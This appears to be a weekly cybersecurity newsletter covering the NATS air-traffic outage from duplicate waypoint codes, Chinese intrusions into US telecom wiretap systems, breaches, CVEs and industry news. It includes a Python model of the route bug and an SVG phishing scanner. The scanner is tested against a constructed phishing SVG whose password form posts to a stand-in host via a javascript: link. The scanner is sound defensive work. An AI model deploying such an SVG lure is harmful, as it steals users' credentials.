Robin’s Newsletter #335

17 November 2024. Volume 7, Issue 46
£100M air traffic incident caused by duplicate airport codes. CISA and FBI say China was after wiretap data.

This week

Thanks for your feedback on the Need to Know Matrix. I’m making some further adjustments to font size this week. Let me know what you think!

Need to Know, 17th November 2024

  • Duplicate airport codes caused £100M outage (This Week)
  • Wordpress security plugin vulnerability (And Finally)
  • Zero-days were most commonly exploited in 2023 (Threat Intel)
  • Thousands of spoof Black Friday websites stealing card info (Interesting Stats)
  • Chinese group was after wiretap data (This Week)

£100M air traffic control outage caused by duplicate airport codes

  • An outage at NATS, the UK’s air traffic control operator, which cost an estimated £75 million to £100 million, was caused by two waypoints in a single flight plan sharing the same three-letter code. The 28 August 2023 incident occurred when the flight plan processing system handled a route that passed through both DVL (Devil’s Lake, North Dakota) and DVL (Deauville, France).
  • The duplicate identifier made the extracted route appear circular, which caused an exception, and the system put itself into maintenance mode. The standby system, although physically separate, ran the same software, received the same flight plan and stopped processing in the same way. In both cases this is intended safety behaviour: stop rather than present potentially corrupted flight data to air traffic controllers. The independent reviewers urged the software developer to review its assurance processes.
  • The issues were compounded because the password of a second-line engineer “could not be readily verified due to the architecture of the system.” That engineer took another 1.5 hours to reach the site, and third-line support was not sought until three hours after the initial event.
  • This sort of independent review is well worth a read; consider how your team could build similar feedback loops and continual improvement into its own major incident management process. LINK, REPORT (PDF)
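As an added illustration of the failure mode described above (my own constructed example, not NATS’s or its supplier’s code; the route, the waypoint names and the UK entry/exit identifiers are made up), the Python below shows how looking a waypoint up by identifier alone can select the wrong DVL, producing a route whose exit precedes its entry, and why a standby system running identical logic on identical input fails identically. The assumed model is that a route is an ordered list of waypoints and that the flight plan names the identifiers of the points where the route enters and leaves UK airspace.

```python
"""Added example: flight-plan route extraction tripped up by two waypoints
that share the identifier DVL. Constructed for illustration; not NATS code.
Assumption: the plan names the identifiers of the UK entry and exit points."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Waypoint:
    ident: str  # three-letter identifier; NOT globally unique
    name: str   # human-readable name, so the two DVLs can be told apart


class RouteError(Exception):
    """Raised when a route cannot be processed safely. The system in the
    incident treated this as a reason to stop and enter maintenance mode."""


# Constructed transatlantic route: passes Devil's Lake (US) and, after
# crossing UK airspace, Deauville (France). Both carry the identifier DVL.
ROUTE = [
    Waypoint("LAX", "Los Angeles"),
    Waypoint("DVL", "Devil's Lake, North Dakota"),
    Waypoint("YQX", "Gander"),
    Waypoint("DOGAL", "constructed UK airspace entry point"),
    Waypoint("STU", "Strumble"),
    Waypoint("SAM", "Southampton"),
    Waypoint("DVL", "Deauville, France"),  # the UK exit point
    Waypoint("CDG", "Paris Charles de Gaulle"),
]


def find_first(route, ident, start=0):
    """Index of the first waypoint with this identifier at or after `start`."""
    for i in range(start, len(route)):
        if route[i].ident == ident:
            return i
    raise RouteError(f"{ident} is not on the route")


def uk_segment_naive(route, entry, exit_):
    """Extract the UK portion by looking up both points by identifier alone."""
    i = find_first(route, entry)
    j = find_first(route, exit_)  # BUG: matches Devil's Lake, not Deauville
    if j <= i:
        # Safety behaviour: refuse to hand a nonsensical route to controllers.
        raise RouteError(f"exit {exit_} at position {j} precedes entry {entry} at {i}")
    return route[i:j + 1]


def uk_segment_fixed(route, entry, exit_):
    """Same extraction, but the exit point is searched for only AFTER the
    entry point, so an identically named waypoint earlier on the route
    cannot be selected."""
    i = find_first(route, entry)
    j = find_first(route, exit_, start=i + 1)
    return route[i:j + 1]


def fails_safe(route, entry, exit_):
    """True if the naive extraction stops with RouteError. The primary and the
    standby ran the same logic on the same plan, so both return True here."""
    try:
        uk_segment_naive(route, entry, exit_)
    except RouteError:
        return True
    return False


def idents(segment):
    return [w.ident for w in segment]


if __name__ == "__main__":
    for system in ("primary", "standby"):
        print(system, "halted:", fails_safe(ROUTE, "DOGAL", "DVL"))
    print("fixed extraction:", idents(uk_segment_fixed(ROUTE, "DOGAL", "DVL")))
```

The forward-only search is the minimal fix; a more robust one disambiguates waypoints by coordinates or region rather than by identifier at all. The point to take from the standby behaviour is that physical redundancy protects against hardware failure, not against a deterministic bug fed the same input twice.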

CISA and FBI confirm Chinese group was after wiretap data

  • Two US government agencies have confirmed that a Chinese state-sponsored group recently breached US telecommunications companies to gain access to wiretap systems.
  • The joint statement from CISA (the Cybersecurity and Infrastructure Security Agency) and the FBI referred to the theft of customer call records (who called whom, and when) and of information subject to law enforcement requests (e.g., wiretaps). This information is useful to intelligence agencies seeking to understand relationships between individuals, or to learn who is being targeted by ‘the other side’.
  • The Wall Street Journal reported on the incident in October (vol. 7, iss. 41); the affected carriers are believed to include AT&T, Lumen (CenturyLink), and Verizon. LINK

Interesting stats

4,695 fraudulent domains have been attributed to a Chinese threat actor dubbed SilkSpecter by EclecticIQ researchers. The domains, which mostly use the .shop, .vip and .store top-level domains, are thought to be part of a network that captures payment card details from consumers seeking Black Friday deals. LINK

Other newsy bits / in brief

🤓 Interesting reads:

  • The story of Charlotte Hooper, whose photos were posted on x-rated forums by a stalker and who is now operations manager at the (excellent) Cyber Helpline. LINK, The Cyber Helpline
  • A deluge of deregulation may lead to less visibility for US policy officials, while the country’s offensive cyber capabilities may be more frequently deployed: Carly Page on the ransomware problem set to be inherited by Trump’s administration next year. LINK
  • Threat actors are increasingly using Scalable Vector Graphics (SVG) to evade email protection systems and display phishing login prompts. LINK
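As an added example of the check a mail gateway or triage script can run on SVG attachments (my own code, not from the linked article; the two SVG documents are constructed), the Python below flags the constructs that turn an “image” into a phishing page: script and foreignObject elements (the latter lets an SVG embed an HTML login form), on* event handlers, and javascript:, data: or external hyperlinks.

```python
"""Added example: triage check for active content in SVG attachments.
Not from the linked article; the sample documents are constructed."""
import xml.etree.ElementTree as ET

# Elements that let an SVG run code or embed arbitrary HTML.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}


def _local(qualified):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list[str]:
    """Return human-readable findings; an empty list means none of the
    constructs checked for are present."""
    findings = []
    root = ET.fromstring(data)
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"active element <{name}>")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            v = value.strip().lower()
            if aname.startswith("on"):
                findings.append(f"event handler {aname} on <{name}>")
            elif aname == "href":
                if v.startswith(("javascript:", "data:")):
                    findings.append(f"{v.split(':', 1)[0]}: URL on <{name}>")
                elif v.startswith(("http:", "https:")):
                    findings.append(f"external link on <{name}>: {value}")
    return findings


# Constructed: an SVG "image" that is really a login form with a script hook.
PHISH_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="400" height="300" onload="location.hash='start'">
  <foreignObject width="400" height="300">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://login.example.test/submit">
      <input name="password" type="password"/>
    </form>
  </foreignObject>
  <a xlink:href="javascript:location='https://login.example.test'">
    <text x="10" y="20">Sign in to view document</text>
  </a>
</svg>"""

# Constructed: an ordinary logo-style SVG.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40">
  <circle cx="20" cy="20" r="18" fill="#336"/>
</svg>"""


if __name__ == "__main__":
    for label, doc in (("phish", PHISH_SVG), ("benign", BENIGN_SVG)):
        print(label, scan_svg(doc) or "clean")
```

Two caveats for production use: parse attacker-supplied XML with defusedxml rather than the standard library parser, and remember that an SVG can also arrive inline in an HTML body or base64-encoded in a data: URI, so filtering on the .svg extension alone is not enough.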

⚠️ Incidents:

  • Amazon has confirmed a breach of employee data, allegedly stolen in May 2023 from a subcontractor’s MOVEit file transfer appliance. The 2.8 million lines of employee data include names, email addresses, contact details, building locations and more. Delta Air Lines and 23 other organisations were named in the same cybercrime forum post. AMAZON, DELTA
  • Retailer Ahold Delhaize, owner of Food Lion, Stop & Shop, Albert Heijn, and others, has pulled systems offline following a “cybersecurity issue”. E-commerce and some pharmacy operations have been impacted. LINK
  • DemandScience, a business contact data broker, suffered a data breach sometime prior to February 2024 that resulted in the loss of information on 122 million people. The company told someone whose data was included in the breach data set that the “leaked data originated from a system that has been decommissioned for approximately two years.” LINK
  • AnnieMac (the American Neighborhood Mortgage Acceptance Company) says that an unknown intruder gained access to the data of 171,000 customers between the 21st and 23rd of August. LINK

🏴‍☠️ Ransomware:

  • The Hungarian government has confirmed that its defence procurement agency has been attacked; the INC Ransomware group claimed responsibility and posted screenshots of VBÜ systems. LINK

🕵️ Threat Intel:

  • A RustyStealer malware infection may lead to a Ymir ransomware attack. LINK
  • North Korean threat actors are using fake Notepad and Minesweeper apps to infect Mac users. LINK
  • The Chinese state-linked Volt Typhoon group has been busy rebuilding its “KV-Botnet”. SecurityScorecard researchers say their primary strategy is to compromise SOHO networking devices, including Netgear ProSAFE firewalls, Cisco RV320s, DrayTek Vigor routers, and Axis IP cameras. LINK
  • Five Eyes cyber agencies warn that exploitation of zero-day vulnerabilities is the “new normal”: most of the vulnerabilities most routinely exploited in 2023 were first exploited as zero-days. In previous years, older, already-patched software issues topped the list. LINK, LIST (PDF)
  • Switzerland’s cyber security agency is warning residents about malware being delivered by post. The “fake letters” include a QR code to download a ‘new weather app’ which actually redirects victims to a malicious application. LINK

🪲 Vulnerabilities:

  • D-Link will not fix three vulnerabilities, including one of critical severity, in its DSL6740C modem because the device was declared ‘end of service’ at the beginning of the year. The critical issue, CVE-2024-11068 (9.8/10), allows an unauthenticated attacker to change any user’s password and so gain access to the device. Around 60,000 devices are believed to be exposed on the Internet, many of them in Taiwan. (This is exactly the sort of vulnerability that the Chinese Volt Typhoon group would use to rebuild its botnet; see Threat Intel above.) LINK
  • Citrix has released patches for a privilege escalation vulnerability and a (limited) remote code execution vulnerability in its Session Recording functionality, CVE-2024-8086 and CVE-2024-8069 respectively. LINK, ADVISORY
  • Fortinet has patched a high-severity vulnerability in its FortiClient VPN application for Windows. CVE-2024-47574 (7.4/10) is an authentication bypass that allows a low-privileged user to gain higher privileges on the device. LINK, ADVISORY

🧑‍💻 End user and consumer:

  • Google is adding a scam protection feature to phone calls on its Pixel devices. The AI-powered system analyses conversations, looking for patterns associated with scammers, and prompts the user to end the call. LINK

📜 Policy & Regulation:

  • National Cyber Director Harry Coker Jr has said the US must take action to harmonise cyber regulation and compliance demands so that CISOs and security teams can spend more time managing their organisation’s cyber risk. LINK

👮 Law Enforcement:

  • Jack Teixeira, a former Massachusetts Air National Guardsman, has been sentenced to 15 years in prison for sharing classified US military documents on Discord. LINK, vol. 6, iss. 16
  • Police in Delhi, India, have arrested a suspect they believe is linked to the theft of $230 million worth of cryptocurrency from the country’s WazirX platform earlier this year. LINK

💰 Investments, mergers and acquisitions:

  • Trustwave and Cybereason announced a merger this week. The merger is described as a “consolidation” move, bringing together Trustwave’s managed services and Cybereason’s product expertise. Terms of the deal were not disclosed. It’s not dissimilar to Sophos’ acquisition of SecureWorks, announced three weeks ago. LINK, vol. 7, iss. 43
  • BitSight has agreed to acquire Cybersixgill for $115 million. The security ratings company will integrate Cybersixgill’s ‘real-time’ threat intelligence, collected from the web, chat rooms, and underground forums, to improve its supply chain security offering. Cybersixgill was valued at $162 million in 2022. LINK

🗞️ Industry news:

  • Oxford University will lead a new cyber research network. The Cyber Security Research and Networking Environment (CRANE) is funded by UK Research and Innovation. LINK, UKRI

And finally

  • The Really Simple Security plugin for WordPress contains an authentication bypass vulnerability that may affect millions of websites. CVE-2024-10924 (9.8/10) was discovered by researchers at Wordfence and, ironically, only affects sites that have enabled the plugin’s two-factor authentication feature. LINK, MORE
Robin
